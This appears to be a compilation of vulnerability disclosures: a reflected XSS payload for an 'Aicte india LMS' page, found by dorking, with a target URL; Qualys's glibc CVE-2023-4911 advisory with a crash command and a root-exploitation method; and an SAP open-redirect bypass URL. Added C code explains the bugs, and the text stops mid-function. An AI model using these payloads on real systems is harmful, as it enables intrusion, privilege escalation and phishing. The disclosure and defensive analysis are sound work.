<pre><code>====================================================================================================================================<br />| # Title : Aicte india LMS 3.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://www.facebook.com/OfficialAICTE/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use payload : /committee.php?n=ANTI-RAGGING'"()%26%25<acx><ScRiPt >prompt(926233)</ScRiPt><br /><br />[+] http://vtcbcsreduin/committee.php?n=ANTI-RAGGING%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(926233)%3C/ScRiPt%3E<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code><br />Qualys Security Advisory<br /><br />Looney Tunables: Local Privilege Escalation in the glibc's ld.so<br />(CVE-2023-4911)<br /><br /><br />========================================================================<br />Contents<br />========================================================================<br /><br />Summary<br />Analysis<br />Proof of concept<br />Exploitation<br />Acknowledgments<br />Timeline<br /><br /><br />========================================================================<br />Summary<br />========================================================================<br /><br />The GNU C Library's dynamic loader "find[s] and load[s] the shared<br />objects (shared libraries) needed by a program, prepare[s] the program<br />to run, and then run[s] it" (man ld.so). The dynamic loader is extremely<br />security sensitive, because its code runs with elevated privileges when<br />a local user executes a set-user-ID program, a set-group-ID program, or<br />a program with capabilities. Historically, the processing of environment<br />variables such as LD_PRELOAD, LD_AUDIT, and LD_LIBRARY_PATH has been a<br />fertile source of vulnerabilities in the dynamic loader.<br /><br />Recently, we discovered a vulnerability (a buffer overflow) in the<br />dynamic loader's processing of the GLIBC_TUNABLES environment variable<br />(https://www.gnu.org/software/libc/manual/html_node/Tunables.html). This<br />vulnerability was introduced in April 2021 (glibc 2.34) by commit 2ed18c<br />("Fix SXID_ERASE behavior in setuid programs (BZ #27471)").<br /><br />We successfully exploited this vulnerability and obtained full root<br />privileges on the default installations of Fedora 37 and 38, Ubuntu<br />22.04 and 23.04, Debian 12 and 13; other distributions are probably also<br />vulnerable and exploitable (one notable exception is Alpine Linux, which<br />uses musl libc, not the glibc). 
We will not publish our exploit for now;<br />however, this buffer overflow is easily exploitable (by transforming it<br />into a data-only attack), and other researchers might publish working<br />exploits shortly after this coordinated disclosure.<br /><br /><br />========================================================================<br />Analysis<br />========================================================================<br /><br />At the very beginning of its execution, ld.so calls __tunables_init() to<br />walk through the environment (at line 279), searching for GLIBC_TUNABLES<br />variables (at line 282); for each GLIBC_TUNABLES that it finds, it makes<br />a copy of this variable (at line 284), calls parse_tunables() to process<br />and sanitize this copy (at line 286), and finally replaces the original<br />GLIBC_TUNABLES with this sanitized copy (at line 288):<br /><br />------------------------------------------------------------------------<br />269 void<br />270 __tunables_init (char **envp)<br />271 {<br />272 char *envname = NULL;<br />273 char *envval = NULL;<br />274 size_t len = 0;<br />275 char **prev_envp = envp;<br />...<br />279 while ((envp = get_next_env (envp, &envname, &len, &envval,<br />280 &prev_envp)) != NULL)<br />281 {<br />282 if (tunable_is_name ("GLIBC_TUNABLES", envname))<br />283 {<br />284 char *new_env = tunables_strdup (envname);<br />285 if (new_env != NULL)<br />286 parse_tunables (new_env + len + 1, envval);<br />287 /* Put in the updated envval. */<br />288 *prev_envp = new_env;<br />289 continue;<br />290 }<br />------------------------------------------------------------------------<br /><br />The first argument of parse_tunables() (tunestr) points to the<br />soon-to-be-sanitized copy of GLIBC_TUNABLES, while the second argument<br />(valstring) points to the original GLIBC_TUNABLES environment variable<br />(in the stack). 
To sanitize the copy of GLIBC_TUNABLES (which should be<br />of the form "tunable1=aaa:tunable2=bbb"), parse_tunables() removes all<br />dangerous tunables (the SXID_ERASE tunables) from tunestr, but keeps<br />SXID_IGNORE and NONE tunables (at lines 221-235):<br /><br />------------------------------------------------------------------------<br />162 static void<br />163 parse_tunables (char *tunestr, char *valstring)<br />164 {<br />...<br />168 char *p = tunestr;<br />169 size_t off = 0;<br />170 <br />171 while (true)<br />172 {<br />173 char *name = p;<br />174 size_t len = 0;<br />175 <br />176 /* First, find where the name ends. */<br />177 while (p[len] != '=' && p[len] != ':' && p[len] != '\0')<br />178 len++;<br />179 <br />180 /* If we reach the end of the string before getting a valid name-value<br />181 pair, bail out. */<br />182 if (p[len] == '\0')<br />183 {<br />184 if (__libc_enable_secure)<br />185 tunestr[off] = '\0';<br />186 return;<br />187 }<br />188 <br />189 /* We did not find a valid name-value pair before encountering the<br />190 colon. */<br />191 if (p[len]== ':')<br />192 {<br />193 p += len + 1;<br />194 continue;<br />195 }<br />196 <br />197 p += len + 1;<br />198 <br />199 /* Take the value from the valstring since we need to NULL terminate it. */<br />200 char *value = &valstring[p - tunestr];<br />201 len = 0;<br />202 <br />203 while (p[len] != ':' && p[len] != '\0')<br />204 len++;<br />205 <br />206 /* Add the tunable if it exists. 
*/<br />207 for (size_t i = 0; i < sizeof (tunable_list) / sizeof (tunable_t); i++)<br />208 {<br />209 tunable_t *cur = &tunable_list[i];<br />210 <br />211 if (tunable_is_name (cur->name, name))<br />212 {<br />...<br />219 if (__libc_enable_secure)<br />220 {<br />221 if (cur->security_level != TUNABLE_SECLEVEL_SXID_ERASE)<br />222 {<br />223 if (off > 0)<br />224 tunestr[off++] = ':';<br />225 <br />226 const char *n = cur->name;<br />227 <br />228 while (*n != '\0')<br />229 tunestr[off++] = *n++;<br />230 <br />231 tunestr[off++] = '=';<br />232 <br />233 for (size_t j = 0; j < len; j++)<br />234 tunestr[off++] = value[j];<br />235 }<br />236 <br />237 if (cur->security_level != TUNABLE_SECLEVEL_NONE)<br />238 break;<br />239 }<br />240 <br />241 value[len] = '\0';<br />242 tunable_initialize (cur, value);<br />243 break;<br />244 }<br />245 }<br />246 <br />247 if (p[len] != '\0')<br />248 p += len + 1;<br />249 }<br />250 }<br />------------------------------------------------------------------------<br /><br />Unfortunately, if a GLIBC_TUNABLES environment variable is of the form<br />"tunable1=tunable2=AAA" (where "tunable1" and "tunable2" are SXID_IGNORE<br />tunables, for example "glibc.malloc.mxfast"), then:<br /><br />- during the first iteration of the "while (true)" in parse_tunables(),<br /> the entire "tunable1=tunable2=AAA" is copied in-place to tunestr (at<br /> lines 221-235), thus filling up tunestr;<br /><br />- at lines 247-248, p is not incremented (p[len] is '\0' because no ':'<br /> was found at lines 203-204) and therefore p still points to the value<br /> of "tunable1", i.e. 
"tunable2=AAA";<br /><br />- during the second iteration of the "while (true)" in parse_tunables(),<br /> "tunable2=AAA" is appended (as if it were a second tunable) to tunestr<br /> (which is already full), thus overflowing tunestr.<br /><br />A note on fuzzing: although we discovered this buffer overflow manually,<br />we later tried to fuzz the vulnerable function, parse_tunables(); both<br />AFL++ and libFuzzer re-discovered this overflow in less than a second,<br />when provided with a dictionary of tunables (which can be compiled by<br />running "ld.so --list-tunables").<br /><br /><br />========================================================================<br />Proof of concept<br />========================================================================<br /><br />$ env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help<br />Segmentation fault (core dumped)<br /><br /><br />========================================================================<br />Exploitation<br />========================================================================<br /><br />This vulnerability is a straightforward buffer overflow, but what should<br />we overwrite to achieve arbitrary code execution? The buffer we overflow<br />is allocated at line 284 by tunables_strdup(), a re-implementation of<br />strdup() that uses ld.so's __minimal_malloc() instead of the glibc's<br />malloc() (indeed, the glibc's malloc() has not been initialized yet).<br />This __minimal_malloc() implementation simply calls mmap() to obtain<br />more memory from the kernel.<br /><br />The question, then, is: what writable pages can we overwrite in the mmap<br />region? 
To the best of our knowledge, we have only two options (because<br />this buffer overflow takes place at the very beginning of ld.so's<br />execution):<br /><br />1/ The read-write ELF segment of ld.so itself (the first pages of this<br />read-write segment are actually ld.so's RELRO segment, but they have not<br />been mprotect()ed read-only yet):<br /><br />------------------------------------------------------------------------<br />7f209f367000-7f209f369000 r--p 00000000 fd:00 10943 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2<br />7f209f369000-7f209f393000 r-xp 00002000 fd:00 10943 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2<br />7f209f393000-7f209f39e000 r--p 0002c000 fd:00 10943 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2<br />7f209f39f000-7f209f3a3000 rw-p 00037000 fd:00 10943 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2<br />------------------------------------------------------------------------<br /><br />However, on all the Linux distributions that we checked, the unmapped<br />hole immediately below ld.so's read-write segment is at most one page,<br />but ld.so's __minimal_malloc() always allocates at least two pages ("one<br />extra page to reduce number of mmap calls"). In other words, the buffer<br />we overflow cannot be allocated immediately below ld.so's read-write<br />segment, and therefore cannot overwrite this segment.<br /><br />2/ Our only option, then, is to overwrite mmap()ed pages that were<br />allocated by tunables_strdup() itself: because __tunables_init() can<br />process multiple GLIBC_TUNABLES environment variables, and because the<br />Linux kernel's mmap() is a top-down allocator, we can mmap() a first<br />GLIBC_TUNABLES (without overflowing it), mmap() a second GLIBC_TUNABLES<br />(immediately below the first one) and overflow it, thus overwriting the<br />first GLIBC_TUNABLES. 
As a result, we can:<br /><br />- either replace this first GLIBC_TUNABLES with a completely different<br /> environment variable, for example LD_PRELOAD or LD_LIBRARY_PATH -- but<br /> these dangerous variables are later removed from the environment by<br /> ld.so (in process_envvars()), and such a replacement would therefore<br /> be useless;<br /><br />- or replace the first GLIBC_TUNABLES with a GLIBC_TUNABLES that<br /> contains dangerous (SXID_ERASE) tunables, which were previously<br /> removed by parse_tunables() -- although this seems promising at first,<br /> exploiting such a replacement would require a SUID-root program that<br /> setuid(0)s and execve()s another program with a preserved environment<br /> (to process the dangerous GLIBC_TUNABLES as root, but without<br /> __libc_enable_secure).<br /><br /> Alas, we do not know of such a SUID-root program on Linux (on OpenBSD,<br /> /usr/bin/chpass setuid(0)s and execv()s /usr/sbin/pwd_mkdb, and was<br /> exploited in CVE-2019-19726); if you, dear reader, know of such a<br /> SUID-root program on Linux, please let us know!<br /><br />At that point, the situation looked quite hopeless, but a comment in<br />ld.so's _dl_new_object() (which is called long after __tunables_init())<br />caught our attention (at line 105):<br /><br />------------------------------------------------------------------------<br /> 56 struct link_map *<br /> 57 _dl_new_object (char *realname, const char *libname, int type,<br /> 58 struct link_map *loader, int mode, Lmid_t nsid)<br /> 59 {<br /> ..<br /> 84 struct link_map *new;<br /> 85 struct libname_list *newname;<br /> ..<br /> 92 new = (struct link_map *) calloc (sizeof (*new) + audit_space<br /> 93 + sizeof (struct link_map *)<br /> 94 + sizeof (*newname) + libname_len, 1);<br /> 95 if (new == NULL)<br /> 96 return NULL;<br /> 97 <br /> 98 new->l_real = new;<br /> 99 new->l_symbolic_searchlist.r_list = (struct link_map **) ((char *) (new + 1)<br />100 + audit_space);<br 
/>101 <br />102 new->l_libname = newname<br />103 = (struct libname_list *) (new->l_symbolic_searchlist.r_list + 1);<br />104 newname->name = (char *) memcpy (newname + 1, libname, libname_len);<br />105 /* newname->next = NULL; We use calloc therefore not necessary. */<br />------------------------------------------------------------------------<br /><br />ld.so allocates the memory for this link_map structure with calloc(),<br />and therefore does not explicitly initialize various of its members to<br />zero; this is a reasonable optimization. As mentioned earlier, calloc()<br />here is not the glibc's calloc() but ld.so's __minimal_calloc(), which<br />calls __minimal_malloc() *without* explicitly initializing the memory it<br />returns to zero; this is also a reasonable optimization, because for all<br />intents and purposes __minimal_malloc() always returns a clean chunk of<br />mmap()ed memory, which is guaranteed to be initialized to zero by the<br />kernel.<br /><br />Unfortunately, the buffer overflow in parse_tunables() allows us to<br />overwrite clean mmap()ed memory with non-zero bytes, thereby overwriting<br />pointers of the soon-to-be-allocated link_map structure with non-NULL<br />values. 
This allows us to completely break the logic of ld.so, which<br />assumes that these pointers are NULL.<br /><br />We first tried to exploit this buffer overflow by overwriting the<br />link_map structure's l_next and l_prev pointers (a doubly linked list of<br />link_map structures), but we failed because of two assert()ion failures<br />in setup_vdso(), which immediately abort() ld.so (all the distributions<br />that we checked compile their glibc, and hence ld.so, with assert()ions<br />enabled):<br /><br />------------------------------------------------------------------------<br /> 96 assert (l->l_next == NULL);<br /> 97 assert (l->l_prev == main_map);<br />------------------------------------------------------------------------<br /><br />We then realized that many more pointers in the link_map structure are<br />not explicitly initialized to NULL; in particular, the pointers to<br />Elf64_Dyn structures in the l_info[] array of pointers. Among these,<br />l_info[DT_RPATH], the "Library search path", immediately stood out: if<br />we overwrite this pointer and control where and what it points to, then<br />we can force ld.so to trust a directory that we own, and therefore to<br />load our own libc.so.6 or LD_PRELOAD library from this directory, and<br />execute arbitrary code (as root, if we run ld.so through a SUID-root<br />program).<br /><br />------------------------------------------------------------------------<br /><br />Where should the overwritten l_info[DT_RPATH] point to? The easy answer<br />to this question is: the stack; more precisely, our environment strings<br />in the stack. 
On Linux, the stack is randomized in a 16GB region, and<br />our environment strings can occupy up to 6MB (_STK_LIM / 4 * 3, in the<br />kernel's bprm_stack_limits()): after 16GB / 6MB = 2730 tries we have a<br />good chance of guessing the address of our environment strings (in our<br />exploit, we always overwrite l_info[DT_RPATH] with 0x7ffdfffff010, the<br />center of the randomized stack region). In our tests, this brute force<br />takes ~30s on Debian, and ~5m on Ubuntu and Fedora (because of their<br />automatic crash handlers, Apport and ABRT; we have not tried to work<br />around this slowdown).<br /><br />------------------------------------------------------------------------<br /><br />What should the overwritten l_info[DT_RPATH] point to? In other words,<br />what should we store in our 6MB of environment strings? l_info[DT_RPATH]<br />is a pointer to a small (16B) Elf64_Dyn structure:<br /><br />- an int64_t d_tag, which should be DT_RPATH (15), but this value is<br /> never actually checked anywhere, so we can store anything there;<br /><br />- a uint64_t d_val, which is an offset into the ELF string table of the<br /> SUID-root program that is being executed (this offset references a<br /> string that is the "Library search path" itself).<br /><br />In our exploit, we simply fill our 6MB of environment strings with<br />0xfffffffffffffff8 (-8), because at an offset of -8B below the string<br />table of most SUID-root programs, the string "\x08" appears: this forces<br />ld.so to trust a relative directory named "\x08" (in our current working<br />directory), and therefore allows us to load and execute our own<br />libc.so.6 or LD_PRELOAD library from this directory, as root.<br /><br />------------------------------------------------------------------------<br /><br />One major problem remains unsolved, however: to avoid the kind of<br />assert()ion failures mentioned earlier (when we tried to overwrite the<br />l_next and l_prev pointers of the 
link_map structure), we must overwrite<br />the soon-to-be-allocated link_map structure with NULL pointers only<br />(except l_info[DT_RPATH], of course); but intuitively, the ability to<br />overflow a buffer with a large number of null bytes while parsing a<br />null-terminated C string sounds quite unusual.<br /><br />Luckily for us attackers, the bytes that are written out-of-bounds by<br />parse_tunables() are also read out-of-bounds (at line 234), but not from<br />the mmap()ed copy of our GLIBC_TUNABLES environment variable (tunestr),<br />but from our original GLIBC_TUNABLES environment variable in the stack<br />(valstring, at line 200). Consequently, if we store a large number of<br />empty strings (null bytes) immediately after our GLIBC_TUNABLES in the<br />stack, followed by the string "\x10\xf0\xff\xff\xfd\x7f", followed by<br />more empty strings (null bytes), then we safely overwrite the link_map<br />structure with null bytes (NULL pointers), except for l_info[DT_RPATH]<br />(which we overwrite with 0x7ffdfffff010, which points to our own<br />Elf64_Dyn structures in the stack with a probability of 1/2730).<br /><br />Final note: the exploitation method described in this advisory works<br />against almost all of the SUID-root programs that are installed by<br />default on Linux; a few exceptions are:<br /><br />- sudo on all distributions, because it specifies its own ELF RUNPATH<br /> (/usr/libexec/sudo), which overrides our l_info[DT_RPATH];<br /><br />- chage and passwd on Fedora, because they are protected by special<br /> SELinux rules;<br /><br />- snap-confine on Ubuntu, because it is protected by special AppArmor<br /> rules.<br /><br />Last-minute note: although glibc 2.34 is vulnerable to this buffer<br />overflow, its tunables_strdup() uses __sbrk(), not __minimal_malloc()<br />(which was introduced in glibc 2.35 by commit b05fae, "elf: Use the<br />minimal malloc on tunables_strdup"); we have not yet investigated<br />whether glibc 2.34 
is exploitable or not.<br /><br /><br />========================================================================<br />Acknowledgments<br />========================================================================<br /><br />We thank Red Hat Product Security, Siddhesh Poyarekar, the members of<br />linux-distros@openwall, Salvatore Bonaccorso, and Solar Designer.<br /><br /><br />========================================================================<br />Timeline<br />========================================================================<br /><br />2023-09-04: Advisory and exploit sent to secalert@redhat.<br /><br />2023-09-19: Advisory and patch sent to linux-distros@openwall.<br /><br />2023-10-03: Coordinated Release Date (17:00 UTC).<br /><br /></code></pre>
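The overflow walked through in the Analysis and Proof of concept sections above, as an added example that is not part of the Qualys advisory or of glibc: a C simulation of the parse_tunables() loop that keeps the same scanning and in-place copying logic but writes into a large zero-filled scratch buffer, so the number of bytes written past the tunables_strdup() allocation can be measured instead of crashing. Assumptions made for the example: the tunable table is cut down to two entries (glibc.malloc.mxfast as SXID_IGNORE, as the advisory states, and glibc.malloc.check assumed to be SXID_ERASE), __libc_enable_secure is taken as set (the SUID case), NONE-level tunables are not modelled, and the "fixed" variant follows the approach of the upstream fix, leaving the loop when the end of the input is reached instead of re-parsing the value that was just copied.

```c
/* Simulation of the parse_tunables() sanitization loop in glibc's ld.so (CVE-2023-4911).
 * Added example, not glibc's code: two tunables, __libc_enable_secure assumed set. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

enum seclevel { SXID_ERASE, SXID_IGNORE };   /* NONE-level tunables are not modelled */
struct tunable { const char *name; enum seclevel level; };

/* mxfast is SXID_IGNORE per the advisory; check being SXID_ERASE is an assumption here. */
static const struct tunable tunable_list[] = {
    { "glibc.malloc.mxfast", SXID_IGNORE },
    { "glibc.malloc.check",  SXID_ERASE  },
};

/* Same rule as glibc's tunable_is_name(): the name must be followed by '='. */
static bool tunable_is_name(const char *orig, const char *envname)
{
    for (; *orig != '\0' && *envname != '\0'; envname++, orig++)
        if (*orig != *envname) break;
    return *orig == '\0' && *envname == '=';
}
#define SCRATCH 512
#define POC_VALUE "glibc.malloc.mxfast=glibc.malloc.mxfast=A"   /* the advisory's PoC */

struct parse_result {
    size_t alloc_len;    /* strlen + 1: what tunables_strdup() really allocates */
    size_t high_water;   /* one past the highest tunestr index written */
    bool runaway;        /* kept appending until the scratch area ran out */
    char tunestr[SCRATCH];
};

/* Runs the loop over one GLIBC_TUNABLES value. next_env stands in for the environment
 * string that follows the variable on the stack (NULL: zeros). fixed=false reproduces the
 * vulnerable logic; fixed=true leaves the loop at end of input, as the upstream fix does. */
struct parse_result run_case(const char *env_value, const char *next_env, bool fixed)
{
    struct parse_result r = { .alloc_len = strlen(env_value) + 1 };
    char valstring[SCRATCH] = { 0 };          /* the original variable, on the stack */
    strcpy(r.tunestr, env_value);
    strcpy(valstring, env_value);
    if (next_env) strncpy(valstring + r.alloc_len, next_env, SCRATCH - r.alloc_len - 1);

    char *tunestr = r.tunestr, *p = tunestr;
    size_t off = 0;
    while (true) {
        char *name = p;
        size_t len = 0;
        while (p[len] != '=' && p[len] != ':' && p[len] != '\0') len++;
        if (p[len] == '\0') break;                /* original: tunestr[off] = '\0'; return; */
        if (p[len] == ':') { p += len + 1; continue; }
        p += len + 1;
        char *value = &valstring[p - tunestr];    /* value bytes are read from the stack copy */
        len = 0;
        while (p[len] != ':' && p[len] != '\0') len++;
        for (size_t i = 0; i < sizeof tunable_list / sizeof tunable_list[0]; i++) {
            const struct tunable *cur = &tunable_list[i];
            if (!tunable_is_name(cur->name, name)) continue;
            if (cur->level != SXID_ERASE) {       /* SXID_IGNORE tunables are copied back in place */
                size_t need = (off > 0) + strlen(cur->name) + 1 + len;
                if (off + need >= SCRATCH - 1) { r.runaway = true; return r; }
                if (off > 0) tunestr[off++] = ':';
                for (const char *n = cur->name; *n != '\0'; n++) tunestr[off++] = *n;
                tunestr[off++] = '=';
                for (size_t j = 0; j < len; j++) tunestr[off++] = value[j];
                if (off > r.high_water) r.high_water = off;
            }
            break;
        }
        /* Vulnerable: with no ':' after the value, p stays on that value and the next pass
         * parses "tunable2=AAA" as a second name=value pair (advisory lines 247-248). */
        if (fixed) { if (p[len] == '\0') break; p += len + 1; }
        else if (p[len] != '\0') p += len + 1;
    }
    tunestr[off] = '\0';                          /* the NUL write that ends both variants */
    if (off + 1 > r.high_water) r.high_water = off + 1;
    return r;
}

/* The PoC value, optionally followed by the PoC's "Z=<8192 hex digits>" (here '0's): the padding
 * keeps the out-of-bounds reads (line 234) non-zero, so every pass appends another
 * "glibc.malloc.mxfast=..." that the next pass matches again, until memory runs out. */
struct parse_result run_poc(bool fixed, bool padded)
{
    char next_env[SCRATCH];
    memset(next_env, '0', SCRATCH);
    next_env[0] = 'Z'; next_env[1] = '='; next_env[SCRATCH - 1] = '\0';
    return run_case(POC_VALUE, padded ? next_env : NULL, fixed);
}
size_t poc_high_water(bool fixed, bool padded) { return run_poc(fixed, padded).high_water; }
bool poc_runs_away(bool fixed, bool padded) { return run_poc(fixed, padded).runaway; }
/* True when the secure-mode sanitized copy of env_value equals expected. */
bool sanitizes_to(const char *env_value, const char *expected)
{ return strcmp(run_case(env_value, NULL, false).tunestr, expected) == 0; }

int main(void)
{
    printf("vulnerable wrote %zu of %zu bytes (runaway with padding: %d); fixed wrote %zu\n",
           poc_high_water(false, false), sizeof POC_VALUE, poc_runs_away(false, true),
           poc_high_water(true, false));
    return 0;
}
```

In the simulation the advisory's PoC value (41 characters, so a 42-byte allocation) makes the vulnerable loop write 107 bytes even when the stack bytes after the variable are zero; with the PoC's long "Z=..." variable following it, every pass re-matches the name it has just appended and the loop only stops when the scratch area (in ld.so: mapped memory) runs out, which is the segmentation fault shown in the Proof of concept. The fixed variant writes exactly 42 bytes in both cases, and a well-formed value such as glibc.malloc.mxfast=1:glibc.malloc.check=1 is reduced to glibc.malloc.mxfast=1, the SXID_ERASE removal the code was written to perform.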
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20231005-0 ><br />=======================================================================<br /> title: Open Redirect in BSP Test Application it00<br /> (Bypass for CVE-2020-6215 Patch)<br /> product: SAP® Application Server ABAP and ABAP®<br /> Platform (SAP_BASIS)<br /> vulnerable version: see section "Vulnerable / tested versions"<br /> fixed version: see SAP security note 3258950<br /> CVE number: CVE-2020-6215<br /> impact: medium<br /> homepage: https://www.sap.com<br /> found: 2022-09-23<br /> by: Fabian Hagg (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"SAP is one of the world’s leading producers of software for the management of<br />business processes."[1]<br /><br />[1] https://www.sap.com/about/what-is-sap.html<br /><br /><br />Business recommendation:<br />------------------------<br />By exploiting the vulnerability documented in this advisory, attackers<br />can redirect users to arbitrary sites. Targeted users of such an<br />attack may be victims of successful phishing attempts jeopardizing the<br />confidentiality of logon information or other data.<br /><br />SEC Consult recommends implementing SAP Security Note 3258950, which,<br />according to the vendor, fixes the documented issue. We advise installing<br />the correction as a matter of priority to keep business-critical data secure.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Open Redirect Vulnerability (Patch bypass of CVE-2020-6215)<br />The sample Business Server Pages (BSP) application it00 suffers from an open<br />redirect vulnerability that is referred to by CVE-2020-6215 [2]. 
A patch<br />for this issue was made available via SAP Security Note 2872782 [3].<br />During analysis, it was identified that the patch is insufficient and can<br />be bypassed.<br /><br />[2] https://nvd.nist.gov/vuln/detail/CVE-2020-6215<br />[3] https://me.sap.com/notes/2872782<br /><br /><br />Proof of concept:<br />-----------------<br />1) Open Redirect Vulnerability (Patch bypass of CVE-2020-6215)<br />The following source code excerpt of the event handler OnInputProcessing() of<br />BSP subpage transition_navigation.htm shows that the implementation of<br />SAP Security Note 2872782 introduced an additional check that validates<br />the HTTP request parameter ‘applicationUrl’ against the pseudo-header ~server_name<br />(or ~server_name_expanded if the former is empty). To restrict redirects to the<br />local server, the IF condition only checks whether the specified ‘applicationUrl’<br />parameter contains the host name of the local server anywhere in the string<br />(the ABAP operator CS is a substring test). Only if this check succeeds is the<br />browser of the calling user redirected to the intended page.<br /><br />---------------------------------------------------------------------------<br />[...]<br />    when 'call'.<br />      data: url1 type string,<br />            url2 type string,<br />            host_name type string.<br />      host_name = request->get_header_field( '~server_name' ).<br />      if host_name is initial.<br />        host_name = request->get_header_field( '~server_name_expanded' ).<br />      endif.<br />      url = request->get_form_field( 'applicationUrl' ).<br />      if url cs host_name.<br />        split url at '?' into url1 url2.<br />        url2 = cl_abap_dyn_prg=>escape_xss_url( url2 ).<br />        concatenate url1 '?' url2 into url.<br />        navigation->call_application( url = url ).<br />      endif.<br />* negative test cases<br />    when 'error_no_such_exit'.<br />      navigation->next_page( 'NAVFAIL' ).<br /><br /><br />endcase.<br />---------------------------------------------------------------------------<br /><br />It was observed that this check can be bypassed, for example, by crafting<br />special HTTP requests that contain the host name of the target application<br />server (the PoC uses the <app server hostname> placeholder) within the query string<br />part of the URL provided via parameter ‘applicationUrl’. To validate this issue,<br />the following URL can be browsed to in order to trigger the vulnerability and<br />circumvent the implemented patch.<br /><br />---------------------------------------------------------------------------<br />http[s]://<app server hostname>:<ICM port>/sap/bc/bsp/sap/it00/transition_<br />navigation.htm?ApplicationURL=http://127.0.0.1:8080/?<app server hostname><br />&onInputProcessing%28call%29=Start+Application<br />---------------------------------------------------------------------------<br /><br />For demonstration purposes, after a successful login, the browser is redirected<br />by the application server to localhost on port 8080 (any other host/port pair<br />could be specified by the attacker).<br /><br />The server replies with a "302 Found" message redirecting the browser to the<br />localhost address defined in the response Location header field:<br /><br />---------------------------------------------------------------------------<br />HTTP/2 302 Found<br />Content-Type: text/html<br />Content-Length: 0<br />Location: http://127.0.0.1:8080/?<app server hostname>&sap-params=[...]<br />---------------------------------------------------------------------------<br /><br />An attacker can create a URL which would redirect the victim to a malicious<br />site, for example, a phishing site convincing the victim to login once again.<br /><br 
/><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and found to be vulnerable:<br /><br />- SAP_BASIS release 755, SP level 01<br /><br />According to the vendor the following releases and versions<br />are affected by the discovered vulnerability:<br /><br />- SAP_BASIS 700-702<br />- SAP_BASIS 731<br />- SAP_BASIS 740<br />- SAP_BASIS 750-757<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-10-03: Contacting vendor through vulnerability submission web form.<br />2022-10-04: Vendor confirms receipt and assigns internal ID #2270141902.<br />2022-10-19: Vendor confirms vulnerability and proposes new CVSS score of<br /> 5.4 (NLNR|U|LLN).<br />2022-10-24: Asking vendor why new CVSS rating differs from initial<br /> vulnerability rating. No response.<br />2022-11-24: Asking vendor for update.<br />2022-11-30: Vendor states that the patch is about to be released with the<br /> upcoming Patch Tuesday December 2022.<br />2022-12-13: Vendor releases patch with SAP Security Note 3258950.<br />2023-10-05: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version which should be installed immediately.<br />Patches are available in the form of SAP Security Notes which can be accessed<br />via the SAP Customer Launchpad [4]. 
More information can also be found in<br />the Official SAP Security Patchday Blog [5].<br /><br />The following Security Note needs to be implemented: 3258950<br /><br />[4] https://me.sap.com/app/securitynotes<br />[5] https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10<br /><br /><br />Workaround:<br />-----------<br />Disable BSP test application it00 in the ICF service tree in transaction<br />SICF.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendations about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested in working with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF F. Hagg / @2023<br /><br /></code></pre>
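The check that the SEC Consult advisory above bypasses is a substring test (`if url cs host_name`), so any URL that mentions the server name anywhere, including in the query string, passes. As an added example in C that is not part of the advisory or of SAP's code, the weak check is placed beside a check on the URL's actual host component. The server name sap-app.example.com and the test URLs are constructed for the example; the ABAP CS operator is case-insensitive, which the strstr() stand-in does not model.

```c
/* Host check for the it00 redirect: the substring test from the patched ABAP page beside
 * a comparison against the URL's actual host component. Added example, not SAP's or the
 * advisory's code; the server name and test URLs below are made up. */
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* ABAP "url cs host_name": true when the host name occurs anywhere in the URL.
 * (CS is case-insensitive in ABAP; strstr() is used here for brevity.) */
bool weak_check(const char *url, const char *server_name)
{
    return strstr(url, server_name) != NULL;
}

/* Copies the host of an absolute http(s) URL into host[cap]: the authority up to the
 * first '/', '?' or '#', without any "userinfo@" prefix or ":port" suffix. Returns
 * false for anything else (relative URLs are for the caller to decide on). */
bool url_host(const char *url, char *host, size_t cap)
{
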